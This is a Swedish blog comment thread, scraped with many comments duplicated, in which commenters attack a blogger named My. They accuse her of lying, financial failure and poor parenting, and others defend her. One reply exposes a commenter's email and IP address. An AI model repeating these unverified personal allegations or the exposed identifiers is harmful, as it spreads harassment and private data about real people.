 16. Hon är i princip pank. Därav alla möjliga samarbeten o reklam. Hoppar på allt som ger en peng. Podden vill MTG lägga ner snart. Allt faller! Mycket pga hennes personlighet som gör att ’nya’ bekantskaper inte håller i sig särskilt länge. Hon påstår att det / hon är en ärlig blogg/person. Till o med småsaker ljuger hon om i bloggen. Ta tex hennes tidigare inlägg om att hon slutat med socker. Satt i den veckan intill henne på ett ställe i Täby C där det åts glass i stora lass med all möjlig topping. Varför ljuga om sånt?!….Hon försöker desperat framställa sig som en person hon inte alls är. Det är nästan tragiskt. Och väldigt pinsamt för henne. På endel B-event hon blir inbjuden till är hon INTE populär. Inte ens dessa vill vara vän m henne utan tisslar o tasslar bakom hennes rygg. Allt detta mest pga hennes lögner o opålitlighet. ( jag går ibland på dessa B-Events ?)
  Och det här med flytten!!?? Att sonen är hennes allt o att hon gör vad som helst för honom….Öh….Not! Hade hon brytt sig om honom o vilja vara nära hade hon sett till att bo permanent på Öland o hälsa på ev pojkvän i sthlm varannan helg då hon inte har sonen. Det finns ’vanliga’ jobb hon skulle kunna söka på Öland! Förstår att hon mår dåligt när man lägger ihop allt o alla misslyckanden.

  • Men herregud, vad är du för människa?! OM det du skriver nu skulle stämma, vilket ja verkligen INTE tror att det gör, tycker du då att det är medmänskligt och lämpligt att spy ut alla dessa ”sanningar” i en hånfull och icke-konstruktiv ton som kommentarer under ett inlägg där en uppenbart nedbruten person öppnar upp och berättar om sin panikångest?? Så empatilöst. Påverkar hennes ”lögner” dig på något sätt i din vardag eller varför är detta så viktigt för dig?

   • Icke konstruktiv? Jag säger ju exakt vad hon gör o gjort o de lögner som kommer upp måste väl få påpekas i hennes ’ärliga’ blogg!!

  • Hur gammal e du? Tycker du skall hålla käften om du inte har nått vettigt att säga. Polare med JT eller du kanske är är JT? Omärkta cancer samarbeten som man tjänar pengar på är inte min melodi men kanske din? PK kanske?

  • Hej ”trollet” tänk att du kikade in igen ?
   när jag låste upp kommentarsfältet så gjorde jag dig också möjlig att spåra när du klev ut i ljuset här inne igen… -Välkommen!
   Med över 200 kommentarer, från dig. de ena sjukare än de andra. Blandade påhitt. Förtal, lögner, påståenden om att suttit i samma klassrum under utbildning, på samma event, på samma returang. Påståenden om att Jonas skulle vara otrogen. Att jag skulle missköta min son, mitt jobb, mina vänner. Påhopp om min kropp, mitt utseende. Osv . Allt detta säger ändå mer om dig än om mig. Du sitter ju här inne, åt ut och år in. Enligt dina egna kommentarer lever du i stort sett MITT liv. Du känner MINA vänner och vet mer om mig själv än vad jag själv gör! Det räcker nu. Nu ska du anmälas, spåras och i slutändan förhoppningsvis få proffesionell hjälp!

   • Välkommen att spåra. Jag har aldrig skrivit något som skulle kunna vara hotfullt eller kränkande. Jag har aldrig skrivit att du missköter din son. Jag har ifrågasatt dina val gentemot honom. Jag lever mitt liv men har ett stort kontaktnät. Jag känner inte dina ’vänner’. Men MINA vänner känner många av de som du ibland rör dig med på olika tillställningar. Och det är inte dina vänner heller. Men man hör o ser. Inget konstigt med det. Och det är du som envisas med att kalla dig o din blogg ÄRLIG. Och då flera sett igenom din så kallade ärlighet så får du räkna med att det som du ljuger om kommer fram i ljuset.
    Du kan ju trots att många många frågat ang din mäklarutbildning inte svara. Trots att jag vet så ställer jag frågan igen så andra som undrar: Hur går det med mäklarutbildningen? Klarat alla prov/tentor? Dusör där regelbundet som man ska och det flyter på jättebra? Är det så?
    Jag behöver inte så mycket professionell hjälp. Men snälla, för ditt eget bästa: sluta ljuga. Sluta försöka övertyga dig att det som inte är sant är sant. Bara där tror jag du mår bättre om du är den du är. Du är så genomskinlig. Hoppas iaf att din behandling får dig att må bättre. Sånt kan också göra en ödmjuk och tappa behovet av bekräftelse utifrån. Men du visar i ditt svar här återigen stt du hittar på och vänder på saker. Mycket sv det du skriver har jag aldrig varken sagt eller skrivit, du har väl bakat ihop endel från vad andra skrivit till dig. Men ärligt så hoppas jag stt du kommer på fötter igen och inser att du också mår bättre av att vara ärlig. Ha en fin helg! /J

 17. Håller med, en stor varm kram till dig My. Skönt att du Inter ut dig om dumma o obegåvade kommentarer. Dom suger bara energi o det behöver du till bättre saker i ditt liv?

   • Men suck. Du är lika ärlig som alla andra alltså?! Spelar samma spel, säger A men inte B, söker uppmärksamhet och vill vara viktig.
    Du fattar ju att kommentarer om MG väcker nyfikenhet, om du inte kan svara så ta inte upp det! Tror inte på nåt du skrivit pga detta. Hade du vetat så hade du sagt som det var! Du vill bara verka viktig.

 18. Varför håller du på att gör dig märkvärdig om du nu mår så dåligt. Det första rådet är att tagga ner och bete dig som den problem person du är. Du är inte och kommer aldrig att bli bättre än någon annan. Sorry.

  • Dina kommentarer här inne nu under kvällen!Och du verkar må bra och så? :

   Anonym
   kaj@yahoo.com
   62.119.166.1
   Postat 2018-05-09 kl. 19:18
   Varför håller du på att gör dig märkvärdig om du nu mår så dåligt. Det första rådet är att tagga ner och bete dig som den problem person du är. Du är inte och kommer aldrig att bli bättre än någon annan. Sorry.

   Välj kommentar Anonym
   kaj@uahoo.com
   62.119.166.1
   Postat 2018-05-09 kl. 19:24
   Nu får ta och berätta hur det ligger till med alla dina misslyckanden och inte försöka att verka flashigare och lyxigare än du är. Försk inte framstå som bättre, vackrare och rökare än någon annan för det är du inte.

   Anonym
   nkaj@Yahoo.com
   62.119.166.1
   Postat 2018-05-09 kl. 20:07
   Äcklig mat och sunkig bambarestaurang du gör reklam för. Knappast någon smalmat. Fick du sparken som PT?

 19. Nu får ta och berätta hur det ligger till med alla dina misslyckanden och inte försöka att verka flashigare och lyxigare än du är. Försk inte framstå som bättre, vackrare och rökare än någon annan för det är du inte.

 20. Tittar in och vet Du vad jag lämnar till Dig My?
  – En stor Kram och ett Lycka till och Du har verktygen för att allt skall gå Dig väl i händer!
  Du har kärleken i lillpojken och storpojken! Trevlig helg!

 21. Hon är i princip pank. Därav alla möjliga samarbeten o reklam. Hoppar på allt som ger en peng. Podden vill MTG lägga ner snart. Allt faller! Mycket pga hennes personlighet som gör att ’nya’ bekantskaper inte håller i sig särskilt länge. Hon påstår att det / hon är en ärlig blogg/person. Till o med småsaker ljuger hon om i bloggen. Ta tex hennes tidigare inlägg om att hon slutat med socker. Satt i den veckan intill henne på ett ställe i Täby C där det åts glass i stora lass med all möjlig topping. Varför ljuga om sånt?!….Hon försöker desperat framställa sig som en person hon inte alls är. Det är nästan tragiskt. Och väldigt pinsamt för henne. På endel B-event hon blir inbjuden till är hon INTE populär. Inte ens dessa vill vara vän m henne utan tisslar o tasslar bakom hennes rygg. Allt detta mest pga hennes lögner o opålitlighet. ( jag går ibland på dessa B-Events 😊)
  Och det här med flytten!!?? Att sonen är hennes allt o att hon gör vad som helst för honom….Öh….Not! Hade hon brytt sig om honom o vilja vara nära hade hon sett till att bo permanent på Öland o hälsa på ev pojkvän i sthlm varannan helg då hon inte har sonen. Det finns ’vanliga’ jobb hon skulle kunna söka på Öland! Förstår att hon mår dåligt när man lägger ihop allt o alla misslyckanden.

  • Men herregud, vad är du för människa?! OM det du skriver nu skulle stämma, vilket ja verkligen INTE tror att det gör, tycker du då att det är medmänskligt och lämpligt att spy ut alla dessa ”sanningar” i en hånfull och icke-konstruktiv ton som kommentarer under ett inlägg där en uppenbart nedbruten person öppnar upp och berättar om sin panikångest?? Så empatilöst. Påverkar hennes ”lögner” dig på något sätt i din vardag eller varför är detta så viktigt för dig?

   • Icke konstruktiv? Jag säger ju exakt vad hon gör o gjort o de lögner som kommer upp måste väl få påpekas i hennes ’ärliga’ blogg!!

  • Hur gammal e du? Tycker du skall hålla käften om du inte har nått vettigt att säga. Polare med JT eller du kanske är är JT? Omärkta cancer samarbeten som man tjänar pengar på är inte min melodi men kanske din? PK kanske?

  • Hej ”trollet” tänk att du kikade in igen 🙂

   när jag låste upp kommentarsfältet så gjorde jag dig också möjlig att spåra när du klev ut i ljuset här inne igen… -Välkommen!

   Med över 200 kommentarer, från dig. de ena sjukare än de andra. Blandade påhitt. Förtal, lögner, påståenden om att suttit i samma klassrum under utbildning, på samma event, på samma returang. Påståenden om att Jonas skulle vara otrogen. Att jag skulle missköta min son, mitt jobb, mina vänner. Påhopp om min kropp, mitt utseende. Osv . Allt detta säger ändå mer om dig än om mig. Du sitter ju här inne, åt ut och år in. Enligt dina egna kommentarer lever du i stort sett MITT liv. Du känner MINA vänner och vet mer om mig själv än vad jag själv gör! Det räcker nu. Nu ska du anmälas, spåras och i slutändan förhoppningsvis få proffesionell hjälp!

   • Välkommen att spåra. Jag har aldrig skrivit något som skulle kunna vara hotfullt eller kränkande. Jag har aldrig skrivit att du missköter din son. Jag har ifrågasatt dina val gentemot honom. Jag lever mitt liv men har ett stort kontaktnät. Jag känner inte dina ’vänner’. Men MINA vänner känner många av de som du ibland rör dig med på olika tillställningar. Och det är inte dina vänner heller. Men man hör o ser. Inget konstigt med det. Och det är du som envisas med att kalla dig o din blogg ÄRLIG. Och då flera sett igenom din så kallade ärlighet så får du räkna med att det som du ljuger om kommer fram i ljuset.
    Du kan ju trots att många många frågat ang din mäklarutbildning inte svara. Trots att jag vet så ställer jag frågan igen så andra som undrar: Hur går det med mäklarutbildningen? Klarat alla prov/tentor? Dusör där regelbundet som man ska och det flyter på jättebra? Är det så?
    Jag behöver inte så mycket professionell hjälp. Men snälla, för ditt eget bästa: sluta ljuga. Sluta försöka övertyga dig att det som inte är sant är sant. Bara där tror jag du mår bättre om du är den du är. Du är så genomskinlig. Hoppas iaf att din behandling får dig att må bättre. Sånt kan också göra en ödmjuk och tappa behovet av bekräftelse utifrån. Men du visar i ditt svar här återigen stt du hittar på och vänder på saker. Mycket sv det du skriver har jag aldrig varken sagt eller skrivit, du har väl bakat ihop endel från vad andra skrivit till dig. Men ärligt så hoppas jag stt du kommer på fötter igen och inser att du också mår bättre av att vara ärlig. Ha en fin helg! /J

 22. Håller med, en stor varm kram till dig My. Skönt att du Inter ut dig om dumma o obegåvade kommentarer. Dom suger bara energi o det behöver du till bättre saker i ditt liv😊

   • Men suck. Du är lika ärlig som alla andra alltså?! Spelar samma spel, säger A men inte B, söker uppmärksamhet och vill vara viktig.
    Du fattar ju att kommentarer om MG väcker nyfikenhet, om du inte kan svara så ta inte upp det! Tror inte på nåt du skrivit pga detta. Hade du vetat så hade du sagt som det var! Du vill bara verka viktig.

 23. Mygggan
  Sluta sälj ner dig
  Du är bra som du är
  Liten är också bra
  Gämför dig inte med andra
  Släpp glammet
  Va basic
  Vilket är du….

  • Tror också du skulle må bättre av att inte prata och skriva om vd som har varit så mycket som du gör utan gå vidare se framåt, de här långa inläggen har vi sett så många gånger My och att leva kvar i det förflutna är inte gott speciellt inte om det har varit jobbigt. Släpp det nu och ta det i sådana fall bara med din terapeut om han / hon tycker ni ska prata om det där, men här inne fyller det ingen funktion blir bara jobbigt att läsa om och om igen, gå vidare.

   • Sorry jag igen, tror också att du skulle må bättre av ett lugnare mer basic liv, det du lever i Stockholm att jaga och hålla sig framme hela tiden måste ta på krafterna, influenser är det så många som är idag och det måste vara en otrolig kamp att få de där fina lukrativa avtalen som de stora som t.ex Bianca Ingrosso och andra får. Med tanke på det du har varit med om så skulle jag tycka att lugn och ro, en daglig struktur måste vara det bästa, bara av omtanke och inget annat.

 24. Mygggan
  Sluta sälj ner dig
  Du är bra som du är
  Liten är också bra
  Gämför dig inte med andra
  Släpp glammet
  Va basic
  Vilket är du….

  • Tror också du skulle må bättre av att inte prata och skriva om vd som har varit så mycket som du gör utan gå vidare se framåt, de här långa inläggen har vi sett så många gånger My och att leva kvar i det förflutna är inte gott speciellt inte om det har varit jobbigt. Släpp det nu och ta det i sådana fall bara med din terapeut om han / hon tycker ni ska prata om det där, men här inne fyller det ingen funktion blir bara jobbigt att läsa om och om igen, gå vidare.

   • Sorry jag igen, tror också att du skulle må bättre av ett lugnare mer basic liv, det du lever i Stockholm att jaga och hålla sig framme hela tiden måste ta på krafterna, influenser är det så många som är idag och det måste vara en otrolig kamp att få de där fina lukrativa avtalen som de stora som t.ex Bianca Ingrosso och andra får. Med tanke på det du har varit med om så skulle jag tycka att lugn och ro, en daglig struktur måste vara det bästa, bara av omtanke och inget annat.

 25. Håller inte med i lägget om dåliga kommentarer. Tror på dig My o vill dig allt gott. Lycka till med livet o se framåt istället för bakåt. Kram

 26. Rent vidriga kommentarer en del kommer med.
  Men jag tror heller inte att My håller på med mäklarutbildningen.
  Det är ju så många som frågar men inte får svar.
  Sen tycker jag också ärligt talat att hon kunde flyttat till Öland och låtit kärl

 27. Och låtit kärleken åka till henne. Nu bor hon ju på Öland i alla fall en vecka i taget och då ska man väl inte klaga för mycket.
  Men om Jonas går runt till sina vänner och klagar på att hon ältar, då är Jonas en riktig strunt om han inte tar det med henne
  Jag har skrivit flera gånger att hon behöver inte skriva lång långa inlägg om allt som varit. Vi vet det nu.
  Släpp det gamla My ( och det tycker jag vissa av er som kommenterar ska göra också )
  Släpp det gamla , fokusera på EN sak i taget och OM din ekonomi är dålig så skaffa då ett jobb. Nåt som sker på samma tider och på samma plats. Regelbundenhet. Jag tror inte man blir rik på att sälja grönsakspiller och man blir kanske inte rik på ett 9-5 jobb heller men det är säker inkomst och framförallt kontinuitet.
  Ta vara på varje stund, lev i nuet, och tänk på att berätta hur du mår NU. Vi vet som sagt allt redan och jag tror inte du mår bra av det.

 28. Håller inte med i lägget om dåliga kommentarer. Tror på dig My o vill dig allt gott. Lycka till med livet o se framåt istället för bakåt. Kram

 29. Men alltså. Jag läser era kommentarer och blir helt mållös. Ja, det kan mycket väl vara så att My ljuger en hel del, vad vet jag? Jag känner inte henne alls. Man kan ju bygga upp en hel blogg i flera år och ljuga om 50 % men då är det ju en sjukdom och man ska aldrig kasta skit på en sjuk människa.
  Sen det här med My och Magdalena G, som jag förövrigt inte heller känner det minsta så vad kan vara så vidrigt att man blir så bittra fiender och skvallertanter, mobbare och lögnare förstår jag inte. Inte ens att ligga med ett gammalt ex, då har man ju allvarliga problem (i mina tankar) om man skapar så mycket drama om ett ligg med ett ex. Det är då också sjukdom och då kan man inte heller kasta skit på Magdalena G för då är hon också en sjuk människa. ( Man kan aldrig äga en annan människa)
  Ljuga och ligga med ett ex och så blir det alla dessa sjuka kommentarer. Världen går väl inte under för det där. Vad annars skulle det kunna vara? Har hon gjort nått olagligt så kan ju MG anmälan henne så, nää jag tänker inte ens skriva sandlådenivå för barn är åtminstone mer ärliga än så. Dom slåss och kastar sand på varandra men sanningen kommer fram och inga hycklande ev. till och med påhitt då ingen sagt ett ärligt ord.
  Var finns ärligheten på denna jord?
  Till dig My, är det så att du inte far helt med sanningen, vad vet jag? Inget. Glid lite fint ur den för ingen är perfekt. Alla kan be om ursäkt för att man inte ville misslyckas. Alla kan misslyckas, det är ingen katastrof. Det är livet.
  Okey Vargar……
  Hit me

 30. Rent vidriga kommentarer en del kommer med.
  Men jag tror heller inte att My håller på med mäklarutbildningen.
  Det är ju så många som frågar men inte får svar.
  Sen tycker jag också ärligt talat att hon kunde flyttat till Öland och låtit kärl

 31. Och låtit kärleken åka till henne. Nu bor hon ju på Öland i alla fall en vecka i taget och då ska man väl inte klaga för mycket.
  Men om Jonas går runt till sina vänner och klagar på att hon ältar, då är Jonas en riktig strunt om han inte tar det med henne
  Jag har skrivit flera gånger att hon behöver inte skriva lång långa inlägg om allt som varit. Vi vet det nu.
  Släpp det gamla My ( och det tycker jag vissa av er som kommenterar ska göra också )
  Släpp det gamla , fokusera på EN sak i taget och OM din ekonomi är dålig så skaffa då ett jobb. Nåt som sker på samma tider och på samma plats. Regelbundenhet. Jag tror inte man blir rik på att sälja grönsakspiller och man blir kanske inte rik på ett 9-5 jobb heller men det är säker inkomst och framförallt kontinuitet.
  Ta vara på varje stund, lev i nuet, och tänk på att berätta hur du mår NU. Vi vet som sagt allt redan och jag tror inte du mår bra av det.

 32. Men alltså. Jag läser era kommentarer och blir helt mållös. Ja, det kan mycket väl vara så att My ljuger en hel del, vad vet jag? Jag känner inte henne alls. Man kan ju bygga upp en hel blogg i flera år och ljuga om 50 % men då är det ju en sjukdom och man ska aldrig kasta skit på en sjuk människa.

  Sen det här med My och Magdalena G, som jag förövrigt inte heller känner det minsta så vad kan vara så vidrigt att man blir så bittra fiender och skvallertanter, mobbare och lögnare förstår jag inte. Inte ens att ligga med ett gammalt ex, då har man ju allvarliga problem (i mina tankar) om man skapar så mycket drama om ett ligg med ett ex. Det är då också sjukdom och då kan man inte heller kasta skit på Magdalena G för då är hon också en sjuk människa. ( Man kan aldrig äga en annan människa)

  Ljuga och ligga med ett ex och så blir det alla dessa sjuka kommentarer. Världen går väl inte under för det där. Vad annars skulle det kunna vara? Har hon gjort nått olagligt så kan ju MG anmälan henne så, nää jag tänker inte ens skriva sandlådenivå för barn är åtminstone mer ärliga än så. Dom slåss och kastar sand på varandra men sanningen kommer fram och inga hycklande ev. till och med påhitt då ingen sagt ett ärligt ord.

  Var finns ärligheten på denna jord?

  Till dig My, är det så att du inte far helt med sanningen, vad vet jag? Inget. Glid lite fint ur den för ingen är perfekt. Alla kan be om ursäkt för att man inte ville misslyckas. Alla kan misslyckas, det är ingen katastrof. Det är livet.

  Okey Vargar……
  Hit me

 33. Men snälla ni! Tappar hoppet om mänskligheten när jag läser kommentarerna här!
  • Om My vill skriva om sina år i blomsterbranschen så gör hon det. Jag kan mycket väl förstå hur viktigt det säkert var för henne, att det var en stor del av hennes identitet osv.
  • Fysisk aktivitet (i lagom dos) mår alla med psykisk ohälsa bra av pga endorfinutsöndring m m. (Ons! Generaliserar!)
  • Hon har löst boendesituationen efter bästa förmåga, basta!
  • Alla människor försörjer sig efter sina förutsättningar. Jag tror att många helt enkelt avundas Mys driv, trots att hon kämpar sig tillbaka efter utmattning. Jag tycker i alla fall att det är beundransvärt.
  Sammanfattningsvis: Get a life! Om ni stör er på en blogg, läs inte bloggen – det är så enkelt.
  My, you rock! Kram

  • Johanna du är ju verkligen patetisk, först skriver du att du vet vad som hänt. Sen efter en massa korkade kommentarer att då frågar du Magdalena ist;-). Dessa kommentarer säger mer om dig än My, förmodligen behöver du nån form sv hjälp eller skaffa dig en trevligare hobby. Vissa verkar ju ha förmycket fritid. Svara inte på de My, polisanmäl troll ist, trevlig helg:-)!

     • Nej. JAG Johanna har två alias som jag aldrig byter. Nu far du med osanning igen! Lär du dig aldrig? Tar du inte till dig den konstruktiva kritiken om att du ljuger och inte talar sanning. Det är ju otroligt!
      Och vad gjorde du Linda R som nu avföljt dig på Insta?! Du kan inte ens behålla vänner. Stackars Jonas som får stå mitt i mellan detta då dom turnerar tillsammans. Urk.

 34. Men snälla ni! Tappar hoppet om mänskligheten när jag läser kommentarerna här!

  • Om My vill skriva om sina år i blomsterbranschen så gör hon det. Jag kan mycket väl förstå hur viktigt det säkert var för henne, att det var en stor del av hennes identitet osv.
  • Fysisk aktivitet (i lagom dos) mår alla med psykisk ohälsa bra av pga endorfinutsöndring m m. (Ons! Generaliserar!)
  • Hon har löst boendesituationen efter bästa förmåga, basta!
  • Alla människor försörjer sig efter sina förutsättningar. Jag tror att många helt enkelt avundas Mys driv, trots att hon kämpar sig tillbaka efter utmattning. Jag tycker i alla fall att det är beundransvärt.
  Sammanfattningsvis: Get a life! Om ni stör er på en blogg, läs inte bloggen – det är så enkelt.
  My, you rock! Kram

  • Johanna du är ju verkligen patetisk, först skriver du att du vet vad som hänt. Sen efter en massa korkade kommentarer att då frågar du Magdalena ist;-). Dessa kommentarer säger mer om dig än My, förmodligen behöver du nån form sv hjälp eller skaffa dig en trevligare hobby. Vissa verkar ju ha förmycket fritid. Svara inte på de My, polisanmäl troll ist, trevlig helg:-)!

     • Nej. JAG Johanna har två alias som jag aldrig byter. Nu far du med osanning igen! Lär du dig aldrig? Tar du inte till dig den konstruktiva kritiken om att du ljuger och inte talar sanning. Det är ju otroligt!

      Och vad gjorde du Linda R som nu avföljt dig på Insta?! Du kan inte ens behålla vänner. Stackars Jonas som får stå mitt i mellan detta då dom turnerar tillsammans. Urk.

 35. Ja My jag håller med L2 och Carro.
  Så bra skrivet av er båda.
  Sedan att My skriver så mycket om sitt tidigare liv är ju ett sätt att bearbeta det hela. Det är hennes sätt och hjälper henne väldigt mycket. Märks både i texter och hennes livesändningar. Hon är på rätt väg trots alla elaka kommentarer som poppar upp här.
  Tack My för att du delar med och jag gillar att följa dig.
  Ha nu en bra helg.
  Kram L

  • Hur svårt att återuppta floristjobbet? Man behöver inte köra eget direkt. Finns massor sv blombutiker i både Stockholm och på Öland där hon( du My) kan söka jobb som florist. En bekant till mig behöver en erfaren florist till båda hennes stora underbara blombutiker. Hon har en i Sthlm och, hör och häpna, en ca 50 min från Öland som är under uppbyggnad. Där kommer hon även behöva en ansvarig. Skulle knappast tveka en sekund om jag var du! Hur låter det i dina öron My? Fast arbete, friskvårdsbidrag, fria resor mellan butikerna mm. Bra lön. Kollektivavtal finns.

   • Johanna…. du röjer idag mer och mer. Dina 52 alias och dina återupprepade längre börjar komma ifatt nu. Jag vet vem du är, snart är det offentligt rent juridiskt. /My

    • Förlåt, men där har du fel. Igen.
     Vad tycker du om floristjobbet jag ev kan fixa in dig på en intervju för? Måste väl vara ett tillfälle svårt att tacka nej till.

    • Jag har 2 alias beroende på om jag är inloggad på dator eller padda.
     Magdalena Johanna heter jag. Maggis är mitt smeknamn. Johanna mitt mellannamn.

    • Ps. Där har vi det igen…52 alias skriver du. Lögn!!
     Räknar du ihop allas då eller.
     Varför måste du överdriva? Vad tjänar du på det? När du till o med ljuger om småsaker är det inte lätt att tro på något du säger/skriver.
     Och ställer någon konkreta frågor, ja DÅ är du inte villig att svara. Du har sagt att du välkomnar konstruktiv kritik, vilket jag gjort. Men direkt får du taggarna utåt och vägrar svara. Jag hoppas du snart mår bättre o mognar. Tror du skulle må mycket bättre utan bloggen.

 36. Om My slutar fara fram o skriva om osanningar så skulle inte särskilt många bry sig. Men då det ständigt uppdagas att hon far med lögner reagerar läsarna. Och ’vännerna’. Och killarna. Och när man läser o ser att hon skrivit att hennes blogg är en ÄRLIG blogg så blir det provocerande. Hon får skriva vilken skit hon vill, men påstå INTE att det är en ärlig blogg!!
  Två lätta till My:
  Du har avslutat mäklarutbildningen hos EO?!
  Ja eller nej.
  Du skröt o peppade för en tid sedan om 100% totalt sockerstopp. Men du kunde inte stå emot. Glass, topping, fika mm.
  Sant eller falskt.
  Vi har många, många fler men sparar på dem ett tag.

 37. Ja My jag håller med L2 och Carro.
  Så bra skrivet av er båda.
  Sedan att My skriver så mycket om sitt tidigare liv är ju ett sätt att bearbeta det hela. Det är hennes sätt och hjälper henne väldigt mycket. Märks både i texter och hennes livesändningar. Hon är på rätt väg trots alla elaka kommentarer som poppar upp här.
  Tack My för att du delar med och jag gillar att följa dig.
  Ha nu en bra helg.

  Kram L

  • Hur svårt att återuppta floristjobbet? Man behöver inte köra eget direkt. Finns massor sv blombutiker i både Stockholm och på Öland där hon( du My) kan söka jobb som florist. En bekant till mig behöver en erfaren florist till båda hennes stora underbara blombutiker. Hon har en i Sthlm och, hör och häpna, en ca 50 min från Öland som är under uppbyggnad. Där kommer hon även behöva en ansvarig. Skulle knappast tveka en sekund om jag var du! Hur låter det i dina öron My? Fast arbete, friskvårdsbidrag, fria resor mellan butikerna mm. Bra lön. Kollektivavtal finns.

   • Johanna…. du röjer idag mer och mer. Dina 52 alias och dina återupprepade längre börjar komma ifatt nu. Jag vet vem du är, snart är det offentligt rent juridiskt. /My

    • Förlåt, men där har du fel. Igen.
     Vad tycker du om floristjobbet jag ev kan fixa in dig på en intervju för? Måste väl vara ett tillfälle svårt att tacka nej till.

    • Jag har 2 alias beroende på om jag är inloggad på dator eller padda.
     Magdalena Johanna heter jag. Maggis är mitt smeknamn. Johanna mitt mellannamn.

    • Ps. Där har vi det igen…52 alias skriver du. Lögn!!
     Räknar du ihop allas då eller.
     Varför måste du överdriva? Vad tjänar du på det? När du till o med ljuger om småsaker är det inte lätt att tro på något du säger/skriver.
     Och ställer någon konkreta frågor, ja DÅ är du inte villig att svara. Du har sagt att du välkomnar konstruktiv kritik, vilket jag gjort. Men direkt får du taggarna utåt och vägrar svara. Jag hoppas du snart mår bättre o mognar. Tror du skulle må mycket bättre utan bloggen.

 38. Om My slutar fara fram o skriva om osanningar så skulle inte särskilt många bry sig. Men då det ständigt uppdagas att hon far med lögner reagerar läsarna. Och ’vännerna’. Och killarna. Och när man läser o ser att hon skrivit att hennes blogg är en ÄRLIG blogg så blir det provocerande. Hon får skriva vilken skit hon vill, men påstå INTE att det är en ärlig blogg!!

  Två lätta till My:
  Du har avslutat mäklarutbildningen hos EO?!
  Ja eller nej.

  Du skröt o peppade för en tid sedan om 100% totalt sockerstopp. Men du kunde inte stå emot. Glass, topping, fika mm.

  Sant eller falskt.

  Vi har många, många fler men sparar på dem ett tag.

  • Johanna är du på riktigt ???
   Du verkar ju vara helt besatt av My.
   Tycker du ska hitta något kul som du mår bra av ist. Trevlig kväll till dej ?

    • Den metod du använder för att förmedla dina tankar och att ge pepp / rikta My åt rätt håll, den hade verkligen avskräckt mig om jag gått till en vän / kollega eller ännu värre ett proffs . Det låter bara …..anklagande. Men jag förmodar att du med din öppenhet här varmt hade förmedlat detta om du råkat på My öga mot öga ?

 39. Johanna! En enkel, Varför detta eviga tjatande?
  Ok, hon kanske inte läser till Mäklare eller hon gör det utan att tala om det.
  Ok, hon kanske beslutade sig för att ge sjutton i socker, men föll.
  Jag tror jag säger åt mig själv att ge fasiken i dålig mat/godis/annat onyttigt, att NU är det slut varenda dag men vad händer? Jo, jag sitter där med min förbannade glass eller med en påse godis eller nått annat sockersött. Varför?? Jo, jag föll. Varför?
  Det jag sa, det var ärligt och sant men det gick inte. Ljög jag då?
  Jag är en enkel människa med både fel, brister och vetskap om att jag inte är perfekt. Jag är glad att jag inte är perfekt för då vore jag helt ensam i hela världen.

  • Synd att det inte finns en gilla knapp för din kommentar.
   Jag hoppas My haft en bra dag idag trots alla skriverier här.
   Jag gamla tant som skulle kunna vara mormor till henne är väl inte alltid överens med vad hon skriver eller vad hon gör, men från att ha olika åsikter till att vara rent elak, är det i min värld ganska långt.
   Jag förstår att flickan mått dåligt och hon HAR haft sin beskärda del av elände men jag tycker faktiskt hon ska sakta ner lite. Oavsett om hon nu blir mäklare eller inte så tror jag i alla fall att ett ”jobb” utanför bloggvärlden är att föredra. Blogga kan man göra ändå. Jag tror på kontinuitet i livet. Att man gör samma saker varje dag trots att det kan kännas som ett ekorrhjul. Men, det måste vara ett helvete att ha en blogg som är helt avhängigt av reklam och sponsorer. Jag tycker att det är strongt av My att dela med sig men för sin EGEN skull bör hon lämna det ”gamla” bakom sig. Jag har de i min närhet som gått i KBT och de har fått lära sig beta av det gamla och släppa in det nya OCH det har funkat.
   Att som My i inlägg efter inlägg dra hela den sorgliga historien om t ex My’s blommor osv river ju hela tiden upp gamla sår.
   My, jag hoppas du mår bra, jag hoppas verkligen också att det inte är sant att Jonas beklagat sig, och jag hoppas innerligt du förstår att OM han gjort det, så ÄR det DIG han skulle pratat med.
   Jag hoppas också du förstår att JAG vill dig inget illa trots att jag inte alltid tycker som du. Men jag har en hel del i min ryggsäck, på gott och ont, att dela med mig av.
   Lycka till
   Kram

  • Grejen är den att ifrågasätter man det hon ena dagen basunerar ut på bloggen så får man en lögn till svar. Eller inget svar. Därför reagerar man på hennes ÄRLIGA blogg då hon ljuger rakt ut. Bättte säga som det är.

   • Johanna, Varför är du överhuvudtaget taget här inne på Mys blogg om du bara ska ska skriva skit. Har du inget liv??????? Du sprider bara ondska. Skaffa dig en egen blogg.
    My sköt om dig och lev ditt liv.

    • En del av mitt ’jobb’.
     Bloggar och sänder vidare till andra bloggar jag samarbetar med så att My kanske till slut förstår innebörden och betydelsen av ärlighet. Hon är 30+ och borde veta bättre. Ju fler som påpekar o genomskådar ifrågasätter henne. Man kan bara hoppas att det en vacker dag går upp ett ljus att hon måste sluta ljuga och äntligen vara ärlig.

  • L2. Ett enkelt svar på din enkla fråga ang tjatet:
   Vi är många som inte får ihop att detta är en ’ärlig’ blogg då 80 % innehåller lögner. Punkt.

 40. Varför så elaka ord och varför sprida så mycket negativ energi? Varför?? Vad vill ni åstadkomma? Skrämmande hur ni beter er. Kram My

  • Johanna är du på riktigt ???
   Du verkar ju vara helt besatt av My.
   Tycker du ska hitta något kul som du mår bra av ist. Trevlig kväll till dej 🙂

    • Den metod du använder för att förmedla dina tankar och att ge pepp / rikta My åt rätt håll, den hade verkligen avskräckt mig om jag gått till en vän / kollega eller ännu värre ett proffs . Det låter bara …..anklagande. Men jag förmodar att du med din öppenhet här varmt hade förmedlat detta om du råkat på My öga mot öga ?

 41. Johanna! En enkel, Varför detta eviga tjatande?

  Ok, hon kanske inte läser till Mäklare eller hon gör det utan att tala om det.
  Ok, hon kanske beslutade sig för att ge sjutton i socker, men föll.

  Jag tror jag säger åt mig själv att ge fasiken i dålig mat/godis/annat onyttigt, att NU är det slut varenda dag men vad händer? Jo, jag sitter där med min förbannade glass eller med en påse godis eller nått annat sockersött. Varför?? Jo, jag föll. Varför?
  Det jag sa, det var ärligt och sant men det gick inte. Ljög jag då?

  Jag är en enkel människa med både fel, brister och vetskap om att jag inte är perfekt. Jag är glad att jag inte är perfekt för då vore jag helt ensam i hela världen.

  • Synd att det inte finns en gilla knapp för din kommentar.
   Jag hoppas My haft en bra dag idag trots alla skriverier här.
   Jag gamla tant som skulle kunna vara mormor till henne är väl inte alltid överens med vad hon skriver eller vad hon gör, men från att ha olika åsikter till att vara rent elak, är det i min värld ganska långt.
